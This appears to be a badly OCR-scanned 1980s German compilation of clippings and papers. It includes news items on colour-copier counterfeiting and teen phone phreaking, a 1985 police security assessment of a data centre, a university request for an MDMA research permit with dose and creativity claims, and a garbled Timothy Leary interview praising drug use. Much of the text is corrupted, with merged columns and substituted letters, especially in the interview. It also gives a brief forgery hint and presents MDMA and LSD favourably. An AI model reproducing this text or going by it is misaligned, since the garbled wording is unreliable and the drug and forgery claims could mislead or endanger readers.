Canon für einen neuen Farbkopierer, der nicht nur den 
Kopierermarkt, sondern auch die Unterwelt revolutio¬ 
nieren könnte. Denn „Color Laser“ kopiert einfach alles 
täuschend echt. Besonders gut Geldscheine, Aus¬ 
weise und Geschäftsbriefe. Die Polizei ist hilflos. 


In Spanien und den USA 
sind bereits kopierte „Blü¬ 
ten" und Schecks aufge¬ 
taucht. Hierzulande schlagen 
die Fahnder Alarm, ehe der 
Kopierer ab Herbst verkauft 
wird Ein Polizist; „Da 
kommt sogar das Wasserzei¬ 
chen durch." 

Die Bundesbank wiegelt 
ab: „Wir sind sicher, daß kei¬ 
ne Blüten hergestellt werden 


können, die nicht erkennbar 
sind.“ Das stimmt. Für Ex¬ 
perten. Aber nicht für den 
kleinen Mann auf der Straße, 
meint ein Fahnder, der an¬ 
onym bleiben will: „Da 
nimmt man normales 7(1- 
Gramm-Papier. Das knistert 
genauso schön. Dann kann 
man den Schein in jeder 
Farbschattierung ein¬ 
schweißen.“ 


Er zeigt auch einen nagel¬ 
neuen, angeblich fälschungs¬ 
sicheren Personalausweis - 
gefälscht, „Man kann aucli 
eine Kopie einschweißen“, 
meint er resigniert. 

Canon fühlt sich nicht für 
etwaigen Mißbrauch mit dem 
Super-Kopierer verantwort¬ 
lich. Ein Manager: „.leder 
Kunde muß selbst für den le¬ 
galen Umgang sorgen," Den¬ 
noch wird über Sicherungen 
nachgedacht. Etwa eine 
Sperre, die nur mit einer 
Kennkarle überwunden 
wird. Nur: Auch diese Karten 
kann „Color Laser" ko¬ 
pieren. 


Telefone „senden*^ auch 

BONN, 29. Dezember (dpa). Das Bun¬ 
despostministerium hAt eingeräumt, daß 
mit Gebührenzählern ausgerüstete Tele¬ 
fone wie kleine Rundfunksender funktio¬ 
nieren und abgehört werden könnten. 
Ein Sprecher versicherte am Montag, 
dies sei aber nahezu belanglos, da die 
„Sendeleistung“ nur 20 bis 30 Zentimeter 
betrage. Eine Rückrufaktion der Appara¬ 
te, wie in der Presse gemeldet, sei nicht 
beabsichtigt. 

In einer Regionalsendung des WDR- 
Fernsehens war vor kurzem berichtet 
worden, Gespräche über rund 1,3 Millio¬ 
nen mit integrierten Gebührenzählern 
ausgerüstete Telefone könnten „auch aus 
einiger Entfernung“ auf Mittel- und 
Langwelle auf unterschiedlichen Fre¬ 
quenzen empfan ” werden. 


Hacker telefonierten 
zum Null-Tarif 

Beaver Dam. (rtr) Sechs jugendli¬ 
che "Hacker“ in Beaver Dam im US- 
Bundesstaat Wisconsin haben über 
ein Jahr lang ausgiebig telefoniert, oh¬ 
ne einen Pfennig Gebühren zu zahlen. 
Wie die Polizei mitteilte, haben sich 
die zwischen 13 und 17 Jahre alten 
Teenager über ihren Computer Num¬ 
mern von Kreditkarten und Telefon¬ 
codes besorgt und dann rund 2000 Te¬ 
lefonate für umgerechnet knapp 
80 000 Mark geführt. Höhepunkt der 
heimlichen Hackeraktivitäten war 
eine zwölf Stunden dauernde Konfe¬ 
renzschaltung mit Teilnehmern in 
New York und Maryland, an der ins¬ 
gesamt 22 Personen beteiligt waren. 









1 


Sicherungsobjekt: 

Rechenzentrum des Deutschen iOWlIlBforschungszentrums 
sowie der geplante räumliche Aufbau für das Uniuersitäts- 
und Klinikrechenzentrum 

2 Besprechung und Ortsbesichtigung: 

Am 27.02.1985 fand eine allgemeine Besprechung und Orts¬ 
besichtigung statt. 

3 Vorbemerkungen: 

Die nachfolgend empfohlenen Sicherungsmaßnahmen werden 
als geeignet angesehen, die mecha.-.ischen Widerstands¬ 
und Widerstandszeitwerte an den als Schwachstellen er¬ 
kannten Bauteilen des zu sichernden Objektes zu erhöhen. 
Es soll dadurch ein ei.nheitliches sicherungstechnisches 
Niveau des gesamten Objektes erreicht werden. 

Die Empfehlungen gehen von der Zielvorstellung aus 
- unter Berücksichtigung der angetroffenen örtlichen 
Voraussetzungen-, ein rechtswidriges Eindringen bzw. 
Einbringen von Gegenständen in das Objekt wesentlich 
zu erschweren und den Schaden bei einem Anschlag mit 
Sprengstoff mit vertretbaren Mitteln so gering wie 
möglich zu halten. 

Ein Anspruch auf Vollständigkeit - unter dem Gesichts¬ 
punkt einer absoluten Schutzwirkung - kann nicht vor¬ 
ausgesetzt werden. 

Die Sicherungsempfehlungen verfolgen das Ziel, die 
Datenverarbeitungsanlage als gesicherte "Insel" inner¬ 
halb des Gebäudes auszubilden. 

Baurechtliche und brandschutztechnische Vorschriften 
können im Rahmen der weiteren Sachverständigen Sußerung 
nicht berücksichtigt werden. 


- 2 - 





LANDES KRIMINALAMT BADEN-WÜRTTE M B L RO 


Sachverständige Äusserung 


Landeskrlmlnalamtes Baden-Württemberg 


Fachgebiet: Krln.lnalpolizelllche PrÄventior. 

- Fichbor«lch EIcherung b tochnIk 


Slcherungsobjekt(e) 


Rechenzentrum 

Deutsches «■KMIforschungs- 
zentrum und Universitäts¬ 
rechenzentrum 


Aufgabenste11ung(en) 


Beratung über die baulich- 
technischen Sicherungsma߬ 
nahmen 


(%l Dezernat 202 - Zentralstelle für Sicherungs¬ 
technik und Beratung 

Oll 202 - 2912.7 - 78/85 - 154/85 


SBi KHK 

TOI 


Anlg.I 3 Bl»tt 


T.uUnt-.m.l,. li . V.imrtllun, (07 II) W 40-1 Tfl»« 7 IS4 ;;; 




2 


örtliche und bauliche Gegebenheiten: 

Das Rechenzentrum als zu sichernder Bereich befindet 
sich im 1. Untergeschoß des Gebäudes. Im Oberteil der 
Außenwände sind durchgehend Fenster angebracht, welche 
ebenerdig zum Gelände abschließen. 

Die Frischluftansaugung erfolgt ebenerdig an der süd¬ 
lichen Fassadenseite. 

Im Erdgeschoß des Gebäudes über dem jetzigen Rechner- 
raum soll zukünftig das Reche.nzentrum der Universität 
installiert werden. 

Sicherungstechnische Empfehlungen: 

Um einen effektiven Schutz vor einem Sprengstoffanschlag 
aufzubauen, sollten die sensitiven Geräte des Rechen¬ 
zentrums in einem gesicherte.". Raum mit Stahlbetonwänden 
in einer Stärke von mindeste.-.s 20 cm untergebracht werden, 
wobei nur eine Tür in entsprechender Ausführung aus cer. 
gesicherten Vorfeld in den Syscemraum führen sollte. . 

Sollte der gesamte Maschiner.raum als gesicherter Raum 
ausgelegt werden, sind folgende Maßnahmen notwendig: 

- verschließen der Fensteröffnungen durch Betonplatcen, 

- Aufbau eines effektiven Zucangskontrollsysteras, 

- Zugang zum Rechnerraum sciire nur über eine Schleuse 
möglich sein. 

In die mechanischen Sicherungsmaßnahmen sollte auch die 
Klimazentrale mit einbezogen werden. 

Die Frischluftzuführung sollte mit einem Kamin oder 
Schacht an der Außenfassade hochgeführt werden, um das 
Einbringen von Flüssigkeiten oder Gasen wesentlich zu 
erschweren. 

Als Alternative zum Verschluß der Fensteröffnungen kann 
innerhalb des Maschinenrauraes ein gesicherter Raum nach 
o.a. Kriterien aufgebaut werden, wobei die Vorhandenen 
Fenster mit einbruchhemmendan Gläsern nach DIN 52 290 
bestückt werden sollten. 


Für den räumlichen Aufbau des Universitäts- und Klinik¬ 
rechenzentrums im Erdgeschoß des Gebäudes sollte an¬ 
gestrebt werden, an der Außenfassade eine Pufferzone 
mit Büroräumen zu errichten. 

Der im Plan eingezeichnete Haschinenraura sollte als 
gesicherte "Insel" mit einer Stahlbetonwand umfaßt 
werden. 

Bezüglich des Aufbaus eines Zugangskontrollsystems 
mit Schleusenfunktion gelten die für das Rechenzentrum 
im 1. Untergeschoß ausgeführten sicherungstechnischen 
Empfehlungen. 

6 Schlußbemerkung: 

Die vorstehend aufgeführten Maßnahmen sind nach hiesiger 
Auffassung Mindestforderungen, um den sicherungstech¬ 
nischen Grundschutz für den Gesar.tbereich Reche.nzentrum 
zu erfüllen. 

Weitergehende Maßnahmen zur Optimierung- aus sicherungs¬ 
technischer Sicht lassen sich aufgrund der örtlichen 
und baulichen Voraussetzunge.n unter dem Gesichtspunkt 
der Verhältnismäßigkeit kaum realisieren. 

Sollten für die Sicherung des Rechenzentrums umfang¬ 
reiche bauliche Maßnahmen geplant werden, steht Ihnen 
das Landeskriminalamt Baden-Württemberg für weitere 
detaillierte Auskünfte und entsprechende Beratungen 
gern zur Verfügung. 


Kriminalhauptkomraissar Techn. Oberinspektor z.A. 




3 


Stuttgart, den 09.04.1985 



UNIVERSITÄT DER BUNDESWEHR MÜNCHEN 

Fakultät für Informatik 

Institut für Systemorientierte Informatik 


Professor Dr. P. Molzberger 

Programmsyste me für Anwendungen _____ 

d.r B.nd,.~.hr-Wrrn,r.H.;..nb.r5.W., 39-0-80 14 Ncubib^r, 

An das 

Bundesgesundheitsamt 
Bundesopium-Stelle 
Postfach 330013 

mit denen wir auch bisher mit Software-Entwicklern experi** 
lOOO Berlin 33 mentiert haben. Dabei sind quantitative Messungen vor- 

aunehnen. Es geht hier um: 

Betr.; Antrag auf Sor.darerlaubnis für Droge MDMA für 
wissenschaftliche Zwecke 


1. den Thadhani-Effekt 

2. Brozesse It. NbP - Neuro-Linguistic Programming. 


Sehr geehrte Damen und Herren, 

im Rahmen des Forschungsprojekts HAIST haben wir mit MDMA 
experimentiert. Da die Droge nach dem Betäubungsmittelgesetz 
seit August 1986 nicht mehr erlaubt ist, bitten wir um eine 
Sondergenehmigung, um die Experimente fortzusetzen. 

Zum Pro~iekt H.ilST 

HAIST steht für Human Abilities in Software-Technologie. Es 
handelt sich um ein interdisziplinäres Forschungsprojekt aus 
Informatik und Psychologie, das auch von der Industrie 
unterstützt wird. International arbeiten wir insbesondere 
mit kanadischen und US-Wissenscha£tlern zusammen. Bin För¬ 
derantrag an die Deutsche Forschungsgemeinschaft, zusammen 
mit einem Kollegen (Psychologe an unserer Fakultät für 
Pädagogik) wird derzeit gestellt. 

In HAIST geht es um die Erschliefung von Kreativitätsreser¬ 
ven von Software-Entwicklern. Einen kurzen überblick entneh¬ 
men Sie bitte dem beigefügten Ausschnitt aus dem Forschungs¬ 
bericht 1985 der Universität der Bundeswehr München. 

'eitere Information über HAIST, z.B. die Veröffentlichungen, 
-^teilen wir Ihnen gern auf Wunsch zur Verfügung. 


:u den bisherigen Experimenten mit MDMA 

:ie Versuche wurden äuBerst sorgfältig von einem Arzt und 
ehreren therapeutisch geschulten Personen vorbereitet und 
begleitet, wobei die Gruppe in einer geschützten Umgebung 
zwei Tage beisammenblieb. Sie dienten dem Zweck, zunächst 
einmal das Mittel kennenzulernen und die grundsätzlichen 
Möglichkeiten zu erkunden. 

Wir haben festgestellt, daß unter geringen Dosen (ISO mg) 
eine Phase extrem hoher geistiger Klarheit auftritt. D' 
Klarheit bleibt teilweise auch noch nach Abklinge 
Einflusses der Droge (ca. 5 Stunden) erhalten, in einem Fall 
bis ca. eine Woche danach. Das äußerte sich in einem Gefühl 

. ««qteiaerter Kontaktfreudigkeit und 

tiefer innerer Harmonie, gesteiget 

erheblich gesteigerter Kreativität und Ueistungsfähigkext^ 
Ausschließlich an dieser Phase der Klarheit sind wir int 
assiert, um sie für unsere Arbeit zv nutzen. 


Thadhani-Effekt 

Unter diesem Namen ist der Effekt bekanntgeworden, daß 
manche Programmierer in einen Zustand extrem hoher 
Konzentration und Leistungsfähigkeit hineinkommen, wenn 
die Antwortzeit des Computers unter ca. eine Sekunde 
sinkt (siehe Abbildung) . Dabei treten im EEG Alphawel¬ 
len auf. Quantitative Leistung und Qualität der Arbeit 
steigen, sprunghaft an. Der Zustand wird als entspannend 
und wünschenswert erlebt. 

(Ähnliche Effekte kann man bei Kindern beobachten, die 
sich voll auf ein Videospiel konzentrieren). 
Spitzenprogrammierer sind in der Lage, in einen ähn¬ 
lichen Zustand auch ohne Biofeedback-Loop Ober den 
Computer hineinzugehen. 

Eines unserer Zwischenziele wäre, es auch anderen 
Programmierern - auch unter weniger günstigen Umständen 
- zu ermöglichen, gezielt in diesem Zustand zu arbei¬ 
ten. wir wissen, daß das erlernbar ist, und wir 
vermuten, daß dieser Lernprozeß unter MDMA erheblich 
beschleunigt werden kann. 

Arbeit mit NLP-ähn lichen Prozessen 

Das Ziel ist das gleiche, nur verwenden wir Methoden, 
die ursprünglich im therapeutischen Bereich entwickelt 
wurden: Bei uns wurde das sog. SUPBRPROGRAMMER- oder 

jlj^STERY—Model entwickelt, daß auf einer Synästhesie 
(Sinnesüberschneidung) des visuellen, des auditiven und 
des kinästhetischen Repräsentations-System basiert) . 
Siehe Grinder/Bandler: "Therapie in Trance". 

Hier wissen wir aus dem therapeutischen Bereich. daß 
die Übertragung derartiger Fähigkeiten unter dem Ein¬ 
fluß von MDMA sehr viel effizienter abläuft. 

Ziel unserer Bemühungen ist der Programmierer, der derar¬ 
tige Konzentrationszustände wiederum integriert. Von uns 
untersuchte spitzenprogrammicrer sind in der Lage, fast 
augenblicklich von ihrer Arbeit umzuschalten, um sich z B 
auf ein persönliches Gespräch zu konzentrieren. 


Vorgesehene A rbeiten 

Der nächste Schritt wird dann 

Klarheit zur Unterstützung der 



bestehen üie Phase der Wir bitten, uns mitzuteilen, unter welchen Bedingung 
gleiche Prozesse zu nutzen, bereit wären, uns eine Ausnahmegenehmigung zu erteilen 
Dieser Antra$ wurde letziendlich wegen Erfolglosigkeit nicht gestellt, 
aber... 


eix 


Sie 



UNTERSUCHUNGEN AN S?ITZSNPROGRAMMIERERN UND SPITZE NTEAMS 
(HAIST) HUMAN AHILITIES IN SQFTV.'ARE TECHNOLOGY - 


Beteiligte Nitatbeiter: Dipl.-Ing. Georg V. Zeraanek 


Laufzeit: 
Pro]ektförderung: 


ab Oktober 1984 
Siemens AG 


FAKULTST FÜR INFORMATIK 
Institut für Systemorientierte Informatik 
Professur für Prograramiersysterae für Anwendungen 
Prof. Dr.-Ing. Peter MOLZBERGER 


Zusammenarbeit mit: Siemens AG, München 

Human Technologies GmbH, .München 

Institut für Orcanisationsberatung und Technologie-Anwendung 
(lOT), München 
TEKNICOM Ottawa, Kanada 


Im Projekt HAIST gehen wir davon aus, daß 
unsere Grenzen in der Fähigkeit, große 
Software-Systeme zu entwickeln, heute 
nicht mehr primär durch technologische 
sondern durch menschliche/zwischenmensch¬ 
liche Faktoren bestimmt werden.,D.h. es 
ist ein fühlbarer Fortschritt auf diesem 
Gebiet heute nur noch erzielbar, wenn 
psychologische und soziotechnische Aspek¬ 
te weit me'nr als bisher in den Brenn¬ 
punkt rüc.ken. 

Ausgehend vom "Superprogramming Effekt", 
der Tatsache, daß einige Softwareleute, 
in ihrer Leistungsfähigkeit, sowohl 
quantitativ wie qualitativ, um eine 
Größenordnung über dem Durchschnitt lie¬ 
gen, werden Untersuchungen über die Ar¬ 
beit des Software-Entwicklers, insbeson¬ 
dere über die Natur des kreativen Prozes¬ 
ses, durchgeführt. Wir arbeiten beispiels¬ 
weise mit NL? (Neurolinguistic Program¬ 
ming) , um exzellentes Verhalten von In¬ 
dividuen zu analysieren, modellhaft zu er¬ 
fassen und auf andere Individuen zu 'über¬ 
tragen. Theoretische Ergebnisse werden im 
Ralunen der Superprogramming-Seminare un¬ 
ter Marktbedingungen erprobt. 

Veröffentlichungen: 

- Molzberger, P.: Software-Entwicklung für 
Führungssyste.me - eine Herausforderung 
an das Bewußtsein der Bundeswehr. In: 
Hofmann, H.VJ., Huber, R.K., .Molzberger, 
P. (Hrsg.); Führungs- und Informations¬ 
systeme. Oldenbourg, München 1932 

- .Molzberger, ?.: Und Programmieren ist 
doch eine Kunst. In: H. Schelle und P. 
Molzberger (Hrsg.): Psychologische As¬ 
pekte der Software Entwicklung. Oiden- 
bourg, München 1983 

- Molzberger, ?.-. Aesthetics and Program¬ 
ming. In Proc. CHI '83 Human Factors in 
Computing Systems (Boston, December 
12-15, 1933), ACM, New York 1983 

- Zemanek, G.V.: Psychologische Ursachen 
von Programmierfehlern. In: Psychologie 
des Programmierens. Schauer, H. und .M. 
Tauber (Hrsg.). Schriftenreihe OCG, 

Band 20. Oldenbourg, Wien-München 1933 

- Molzberger, P-: Transcending the Basic 
Paradigm of Software Engineering, Be- 


Auf der Ebene der Teams experimentieren 
wir mit ‘synergetic groups', d.h. Teams, 
die hinsichtlich Leistung, Qualität und 
persönlicher Zufriedenheit um einen deut¬ 
lichen Faktor über dem Durchschnitt lie¬ 
gen. Hier besteht ein enger Informations¬ 
austausch zu G. Weinberg, Lincoln/ 
Nebraska, der in seinem Buch "Psychology 
of Programming" 1971 erst.mals über derar¬ 
tige Effekte unter dem Titel "egcless" 
programming" berichtete. 

Ein weiterer Schwerounkt der Arbeiten sind 
Procramnierfehler und die .Aufdeckung der 
psychologischen Faktoren, die zu diesen 
"Fehlleistungen" führen. 

In Zusammenarbeit und unter finanzieller 
Förderung durch die Siemens .AG arbeiten 
wir an der Gestaltung von Sof tv/are-Tools, 
die die Forschungsergebnisse berücksich¬ 
tigen und insbesondere geeignet sind, den 
kreativen Prozeß anzuregen. 

Im Herbst 1983 wurde im Vorfeld dieses 
Projektes ein zweitägiger Workshop "Pro¬ 
grammieren mit der rechten Kirnhäifte" 
ausgerichtet. 


rieht Nr. 3405, Fachbereich Informatik, 
Hochschule der Bundeswehr .München , 

f 

- Molzberger, ?.: 3er Computer als Kommu¬ 
nikationspartner. In: Psychologie^der 
Computerbenutzung, Schauer, H. und M.J. 
Tauber (Hrsg.). Schriftenreihe OCG, 

Band 22. Oldenbourg, Wien 1584 

- Zemanek, G.V.: Schnittsteilenentwurf am 
Beisoiel einer .Aufzuqssimulation. In: 
Psychologie der Computerbenutzung. H. 
Schaue,r und M.J. Tauber (Hrsg.). Schrif¬ 
tenreihe OCG, Band 22. Oldenbourg, Vlien- 
München 1934 

- .Molzberger; ?.: Can we Teach Conscious- 
Ly Excellent Programming? Proc. WCCE 85 
(World Conf. on Computers in Educa- 
tion), Norfolk/Virginia, August 1985 

- Zemanek, G.V.: A Formal Tool for 
Checking Program Thinking. In: formal 
models in programming, E. Neuhold, G. 
Chroust (Hrsg.) , North Holland 1935, 

S. 137 - 142. 





TIMOTHY LEARY 


■ms generation of baby boomers is 


76 million sirong. They can 


do whatever they want. 



/S THE [armer 

^ so^calUd LSD 

ru, vhitt da you ihmk of N^<7 
'agan’s adnce on drug! - 

'*Our kids should bc betccr 
anneted dian that! We should 
U them, "Just say, 'No, thank 
,u.’ ” Any blanket "Just say 
□ ” is a negative approach to 
fe, which is typical of the Rea- 
an adminiscration. 

So you duogree vith the huge an- 
Sug campuign? 

I’m totally opposed to non- 

,dult5 using any drug. However, 

he use of drugs by kids should 
X easily handled ln a family in 
vhich there is trust and com- 
munication. The facc that kids 
in the ghetco use dtugs is 

viewed the wrong way. The 

Problem ^^t Ae u no com- 

families wherc there are no modcls, m 

™ -N». ■“'«•"" 

‘'''sta«e bLi ihe ntws? Ajailiiiü 

posed .0 make Aetr own „.^ent pro 

ters. I am consotuuonally °PP°=^ “p® to. AdActs 

Abiuons ^amstmy us^^y d^^ by definraon, slck 

pose a different prob e , ^ ’ druggie or a gun 

people. If you low an co o ^ ^ 

freak, mtervene. «“JZm acnng irre- 

money or guns .^^oAd p e can and do use 


OTOGKAPH by WILLIAM COLIPOt^ 

danüerous maclunety or who tun nuclear plane. I don’c 
want Ae pilot of my plane haUueinaong. Bur intelh^nt 
inAviduals are not going to work for cor^es fet 
would force Aem to do demeaiung things Ute pee , 

LdeGodknowswharAeywoAdwantn««- - 

^ In retrO!pect, whut was the ngn^unce rfihe Satm drug 

W a strong tUx» discouraging expeAnenm- 
Ae huml brain. Before rhe Renaissance, 
oon wiA Ae ^ ^ discovenng 

Aere was a str ng progress m 

Kow the body worked Ihis W ^ ^ 

medicAe W biolo©' ■ must leam how 

ohJlenge Aces ^uinan^t^ 

tbe brain works. Tte s psyAedelic 

^d MülUook durmg None of 

"‘SriLi^rr^tÄ’was hapi^nmgwhenwe took 


psychedelic drugs, because we 
had to use Ae mysdeal langpage 
of the past - Hmdu terms like' 
salori and samhadi, occadt terms 
like illummitm and transcendental 
We didn’t have the scientific 
metaphors to understand wbat 
we were discovering. 

And ve do not»? 

Yup. We had to have a per- 
sonal-computer movement to 
help US understand the brain. 
You see, we can oAy understand 
out mner workmgs m terms of 
Ae extemal, mechanical oc tecA- 
nological models Aat we build. 
We nevet understood Ae circu- 
ladon of Ae blood und we had 
hydraulic Systems moving watet 
around. We didn’t understand 
metabolism until we had mas- 
tered Aermodynamics wiA Ae 
steam engine and understood how coal and oil produce 
power and enetgy. Only Aen could we figpre out how 
carbohyAates and proteins work. Coming from an m- 
dustriaE mechanical culture, how could we possAly un¬ 
derstand Ae brain? Und recendy we Aou^t Ae brain 
was a machine like a big telephone System. This is a 
completely madequate memphor. The psychedelic- 
drug movement of Ae Sixties and Ae personal-com- 
puMt movement of Ae Eighties are inner and outet 
reflccdons of each oAer. You simply cannot under¬ 
stand psychedelic drugs, which activate the brad, 
unless you understand something about Computers. 
It is no accident Aat many of Ae people A Ae Com¬ 
puter movement bad experimented wiA LSD. 

And whal vas kamed? 

Every petson who took acid has his or her own sto- 
ty to teil Thai’s Ae beaudfiil Aing about ic Certainly 




Timothy Leary 


there is no one who had an experience with LSD vviio 
didn’c have an unforgectable, overwhelming experience. 

HofW da coTTtputers help our inner explaration? 

G)mputers Help us iinderstand how our brains proc- 
css informacioa For example, as a psychologist, I was 
taught that ehe synapse, wherc two nerve endin^ ex- 
change informadon, was a sort of on-ofF switching de- 
vice. That is not true at alL At the synapse there are 
millions of quantum signals, like an enormous television 
screen. There is probably more complex informarion 
cxchangcd beeween one synapse and another than in 
mosc Computer programs. But I have co have an under- 
standing of Computers to be able to say thac There is a 
wonderflil paradox here: we can oniy navigate outside 
as well as wc can navigate within. What happened in 
the Sixties was that we did a lot of inner tripping, but 
we lacked the cybernetic-Ian- 
guage technology to express 
and map and chart what we 
werc experiencing. 

Do you miss the Sixties? 

Not rcally, diough 1 must say 
it was a fantasde age of explora* 
doa We had that old-dmc H92 
Columbus fever. We sensed that 
we were brain cxplorers We in- 
tuirivcly used metaphors of travel 
- "tripping,” "comtng down,” 

"head pilots,” "guiding voyag- 
crs.” The metaphor ^tuming on” 
relates to aedvadng che television 
sec and boodng up che Computer. 

These äays, the dru^s in vogue 
are not mmd expandmg. What does that say about the time? 

The drugs that are populär coday — cocaine, pills, 
ecstasy, Venus, Eve — cend to alter mood rather than 
expand consciousness. They can be instrucrive and 
fun if handied prudendy. But we still have to leam 
how to communicate what we experience. Let’s be 
frank: there will be new, improved drugs and waves 
of inremal explorarions. 

With what end? 

It is a genedc imperadve to explorc die brain. Why? 
Because its there. If you are carrying around in your 
head 100 billion mainfirame Computers, you just have to 
gec in there and leam how to operate them. There is 
nodiing in the outside universe that isn't mirrored and 
duplicated inside your brain. 

Do you feel a kmdred spirit with the people who are iden~ 
t^ed with the drug moyement, such as Richard Alpert — 
aJ{-a. Rom Dass — and novelist and Merry Pranhter leader 
Ken Kesey? 

Sure, although we all evolved so differendy. Richard 
talks about going back to che sourcc, which means go- 
ing back to the pasL For many good reasons, Richard 
committed himself to an extremely archaic Hindu or- 
thodoxy. But it’s a pcaceliil phüosophy of caring and 
chanty. Richard was the Mocher Teresa of the psyche« 
delic movemenL You can’c knock that. But Ram Dass 
ain’t gonna blow your mind open with new revelations, 
and he ain’c gonna encourage you co storm the ^tes of 
the info-space heaven with cybemedc bramware. 

How aboui Ken Kesey? 

Ken Kesey and his wife, Faye, are real Western he- 
roes. Mydiic ranchers. Frontier people. Oregon Trail 
folk. Salt of die good earth. Rugged-individualist peo¬ 
ple you can depend on in a crunch. 

How about others associated with that penod? Abbie 
Hoffman? ■. 


Abbie Hofiinan is a wonderflil legend. The most 
radical, eloquent, rabble-rousing agitator of our time. 

Jerry Rubin? 

Jcrry’s your basic YMHA dircctor, a likable young 
exccurive. Jerry is a liberal conformisL He could just as 
well have bcen a young liberal Rcpublican. Hes cer- 
tainly not your new Aristode or Plato. 

What was his role tben? 

He had his own Holy Grail quest. He certainly was 
out there in the front Ünes. And he has a certain or^n- 
izadonal charm, which I admire. If you’re looking for a 
veterans-of-che-Sixties consensus here, Fd guess that 
ninccy percenc of che pecple who were involvcd in die 
psychedelic brain-discovery movement would cell you 
that LSD paved che way fer mosc of che culcural evenis 
of the last two decades — ecoic^, New Age, Shirley 


MacLaine, che hom«agatn pe rsonal- religion stufr, the 
peace movement, che pcrsonal-Timess craze, pop art, 
personal-compucer hacking, MTV, Blade Rjomery Sat- 
urday Night Live and die cybemedc Emilies. 

Cybemetic? 

I diink each decade in the roaring twendeth Century 
has produced new technologies and art forms for per- 
sonalizing and popularizing electronic, light-speed 
quantum energies. Since 1900 our socicty of factory 
workers and farmers has beai transformed into an in- 
iorniadon-age culturc cocally committed to flasJiing re- 
aliücs on screens, Americans spend more dmc looldng 
at television monicors than they do gazing into the eyes 
of fkmily and friends. Power, politics and culture are 
determined by who Controls the screens. 

How does this cffecl you? 

I foUow che trends of evolurion. I go with the elec- 
tron flow. I see myself as a quintcssendal American, 
just going along for the ride, 

Qiantessential? You? 

Hey, Fm sixty-seven ycars old. I have aedvely expe- 
rienced seven decades of acceleratcd change. Fve 
surfed each of che waves of the twendeth Century with 
reasonabie success and an enormous amount of fun. In 
the Forties, I was in the army for five ycars and in 
school on the Gl bill for five years. What could be 
more apple pie? In the Fiftics, I was a button-down 
young Professor with Idds, a Äiburban house, drinldng 
mattmis. In the Sixdes, I dudfuily, düigendy tumed on, 
tuned in and, God knows, dropped oul What was the 
alternative? Tum off, tune ouq blindly conform? 

The Sevendes was the dec^e of the polidcal pris- 
oner. Nixon threw the dissenters in jail I was che first 
one to go into prison; January 1970. Then, afrer Wa¬ 
tergate, it was the Nbion gang’s tum. In the next six 
years, I watched my federalpursuers join me: the attor¬ 


ney general, John Mitchell; Haldcman and Ehrlich- 
man; Gordon Liddy. Now, in che Eighries, how can 
you avoid the Computer revoludon? 

Can you describe your work in the Computer jield? 

My work involves cybcmetic psychology - the per- 
sonalizadon and popularizadon of quantum mechanics. 
Packaging and communicacing choughts at light 
speeds. Fhicdng electronic appliances in the hands of in- 
dividuals. First we had the telephone, then radio, 
movics, television. Now we have Computers, video 
playcrs, compact discs, home-ediring appliances. It’s 
still just the beginning. ln che next five years we’re 
gonna design you an inexpensive electronic facilicy 
for your living room. You’U be able to move Infor¬ 
mation and Images around on your screen in whatev- 
er way you want. Now, that’s revoludonary. 

In what ways? 

In the twenty-first Century, 
whoever Controls the screen Con¬ 
trols consciousness, information 
and thought. The screen is a 
mirror of your mind, get it? If 
you are passively warching 
screens, you are being pro- 
grammed. If you are edidng your 
own screen, you aie in control of 
ycxir mind. George Orwell had it 
wrong. He was coo optimistic. 
He wrotc in 1984 chat Big 
Brother would watch us from 
screens on ihe walls of our living 
rooms or bedrootns. But that is 
noching. You could edways duck 
out of sight. The current Horror is that Americans 
voluntariJy stick their amoeboid faces toward the 
screen six or seven hours a day and suck up informa¬ 
tion that Big Brother is putting there. Here is the 
key to our future: We can and will control our own 
screens. Wc arc designing Software that will empow- 
cr you to prcxluce and direct your own mind movies, 
your own prime-dme shows. 

And how will if <ff]ect us? 

This will create a new model of human being, the 
cybemedc person. A new movement is emerging. 
It’s something like the beatniks of the Fifries or the 
Hippies of the Sixties. It’s callcd cyberpunk. The 
concept comes from William Gibson’s book Neuro- 
mancer. Cyberpunks arc individuals who have the in- 
tcHigence and the courage to access and usc high- 
quantum technology for their own purposes and 
their own modes of communication. 

For example? 

Li the movie WarGames the Idd is a video hotshoL 
At school, the authoritarian, smug teacher gives him a 
hard time. He goes to the prindpal’s office, gets the 
Computer code and goes home and changes his grade. 
He ends up using his cyber skills co match wits with the 
Pentagon Computers. Another example of cyberpunk 
was che young man from Hamburg, Mathias Rust, 
who piloted a small Cessna through the electronic 
nets and defense Systems of the Russians and landed 
in Red Square. Why? Not for the CIA, not for the 
German army, but for his own fucking pleasure. He 
b a classic cyberpunk. Charles LLndbcrg, che Lone 
Eagle, was another. Stanley Kubrick. Jann Wenner. 
Steve Jobs. I could go on. 

And they symbolize what? 

Taldng control of the haturc oursclves. Ignoring 
old-dme insdtudons and archaic polidcs. You don’t or- 



SD paved way for mMt 

of the cultural eventd of the laot two decade.) -ecology, thefitncA) 
craze, the peace nwvement, Shirley MacLaine .. 






Timothy Leary 


ganizc in old-time polidcal groups or get involvcd in 
campaigns for polincal office. You don’t gct involued in 
thc old stTUggle for or against Big Broiher. You pilot 
out to thc frontier and navigate a new life. Cyhcr comes 
from the Greek word for "pilop” Once you dcclare 
your independencc in your mind, you’re home free. 

As more and morc people become free agents, or 
cvber pilors, it’s gonna make an cnormous differenct. 
vyfrcn we get just ten perccnt of thc people operadng 
this way, it wjl clmngc the System, becausc thcy arc the 
smartest ten percenL Star Vv^ars, for cxample, cannot 
operate if ten perccnt of the Computer techies think for 
themselvcs, To run a modern socict>' you depend upon 
skilled, innovative quanmm intelligence. Tltese are ex- 

acrly thc people who arc not go-__ 

ing to bccomc va.ssals to an eco- ff- 

nomic or political organiaaoon. | 

In his Book Neurovumm, Gib- | 

son spells out a soaology for thc 1 ly// 

rwcnty-firsr Century that makes a I //. 

lot of scnse. The world is con- | ß' p 

trollcd by international global | 

comhincs based in Japan, Ger- || . •,/,//.£ 

many, Switzcrland. Nationalism I (j£mlll^ WLch tnC Oedt- 
i,s down. The multinationals | 

won't allow war to break out; ^ucütcdqencration 

chey can’t let die Russians bomb ^ 

Amcnca, bccausc diey own most • / • . O r ■ 

of America. And it’s an anumng- Ul bldtory. ÜIU 

ly free world. The international 

combincs don’t carc about your ÜOt U brUUl 

lifescyle. They just wart us all J 3 

to b« Consumers witli individual ,, ^ •,/ ■ 

options. They’rc not like thc Is- OreMCO Up Wlth 

lamic fundamentalists or the 

Reagan right-wingers or che rwwhcrt tO QO,' 

communist moralists. They 
don’c carc whac your sex life is. 

They don’t carc what drugs you 

takc, as long as you consume. — 

